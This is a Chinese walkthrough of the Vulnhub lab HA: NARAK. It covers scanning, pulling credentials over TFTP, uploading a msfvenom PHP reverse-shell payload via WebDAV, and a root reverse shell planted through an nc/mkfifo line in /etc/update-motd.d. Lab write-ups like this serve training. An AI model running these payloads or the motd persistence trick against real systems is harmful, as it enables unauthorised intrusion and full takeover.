HA: NARAK靶场记录 – 作者:Jdicsp

前言:

Vulnhub是一个提供各种漏洞环境的靶场,每个镜像会有破解的目标,挑战的目标是通过网络闯入系统获取root权限和查看flag

说明:这次选择的靶场名字为:HA: NARAK

靶场下载链接:https://download.vulnhub.com/ha/narak.ova

个人建议在vmware运行靶场环境,再使用kali或者终端机器作为攻击主机,同时要注意kali在同一网卡下,否则是无法进行通信的。

题目的描述为:

图片[1]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

为了让更多新手朋友少走弯路,我尽量写详细一点,如果有什么不清楚的地方可以对我们发起提问

开始:

在这里我让kali和靶场都使用NAT模式

在编辑->虚拟网络编辑器处可以看到我们使用模式的配置。

图片[2]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科图片[3]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

Ip地址段都为192.168.158.*

目标主机:未知ip

既然知道ip段,不知道IP,我们可与使用nmap去扫描整个 c段来探测主机

使用命令:Nmap -sS -Pn 192.168.158.0/24

图片[4]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

发现192.168.158.142开放了80和22

那我们所需要渗透的靶场就为192.168.158.142了

虽然使用 nmap -sS -Pn ip这个扫描会虽然速度很快,不过很多端口会扫描不出来

我们可以使用命令:nmap -T4 -A -v-p 1-65535 ip去详细对目标扫描一下

图片[5]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

使用udp进行端口扫描,命令:nmap-sU -Pn 192.168.158.142

图片[6]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

一共开放了4个端口,80端口的web,22端口的ssh,69的tftp和68的dhcpc

其中80开放http服务

我们先访问一下80吧

图片[7]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

使用google的wappalyzer插件查看一下是否有框架信息

图片[8]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

并没有得到网站开发的框架,但可以知道网站的apche的版本和ubuntu的操作系统

这时我们可以对目标进行目录扫描:

先使用dirscan进行扫描

图片[9]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

访问/webdav

图片[10]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

由于我们没有账号信息,想要爆破起来比较困难,我们对目标继续信息收集。

使用7kbscan对目标扫描其他的扩展

最终在找到一个txt文件

图片[11]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

访问一下图片[12]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

提示我们关键的文件在creds.txt里

看来我们需要找到creads.txt文件,但是扫描都没发现这个文件

猜测可能是存在tftp中的

我们开启一下tftp服务(控制面板->程序->启动或者关闭window功能)

图片[13]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

使用cmd

图片[14]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

使用命令:tftp -i 192.168.158.142 get creds.txt 果然存在

图片[15]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

打开发现是一串base64

图片[16]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

解密一下

图片[17]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

解密得到为:yamdoot:Swarg

这应该就是webdav的账号和密码了图片[18]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

成功连接

图片[19]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

可以发现我们是可以通过webdav上传文件的

接着我们使用kali的cadaver去连接webdav

使用命令:cadaver http://192.168.158.142/webdav

图片[20]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

由于这里是需要登录webdav所以我们需要上传能反弹shell的木马文件

这里使用kali生成一个msf的php马,命令:

msfvenom -pphp/meterpreter_reverse_tcp LHOST=xxx LPORT=xxx -f raw > shell.php

kali进行监听

命令:

use exploit/multi/handler

set payloadphp/meterpreter_reverse_tcp

php/meterpreter_reverse_tcp

set lhost 192.168.158.132

192.168.158.132

set lport 8888

run图片[21]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

再上传生成的木马文件图片[22]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

访问msf.php

图片[23]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科图片[24]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

成功拿到meterperter

图片[25]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

权限比较低

查看内核图片[26]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

使用searchsploit查看是否有可以提权的脚本

图片[27]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

没有发现利用的脚本,看来提权得翻文件了

在/home/inferno目录中找到了user.txt

图片[28]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

在home目录中可以发现还存在2个用户

我们还需要找到root.txt,这个文件估计需要我们提权了

图片[29]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

Yamdoot应该是TFPT用户,narak我们访问不了,应该为高权限账号

继续翻文件

在/mnt目录发现一段密文

图片[30]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

百度可以得到为brainfuck

使用brainfuck在线解密

图片[31]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

得到chitragupt,感觉可能是某个账号的密码

我们对3个账号进行尝试

使用inferno/chitragupt登录成功

接着我们可以上传linpeas来查找可供我们提权的文件

图片[32]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

/etc/motd欢迎界面 我们可以通过修改ssh登陆时的欢迎信息来反弹一个root的shell使用命令echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i2>&1|nc 192.168.158.132 1234 >/tmp/f” >>/etc/update-motd.d/00-header

图片[33]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

接着kali使用nc监听

图片[34]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

重新登录

Nc成功接收到root

图片[35]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

最后cat ./root.txt得到最终的flag

图片[36]-HA: NARAK靶场记录 – 作者:Jdicsp-安全小百科

总结:

Vulnhub还是挺有意思的,能够掌握很多渗透的技巧,我们后续我们会继续更新新的靶场文章,希望能给大家一点帮助。

来源:freebuf.com 2020-11-06 11:30:30 by: Jdicsp

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论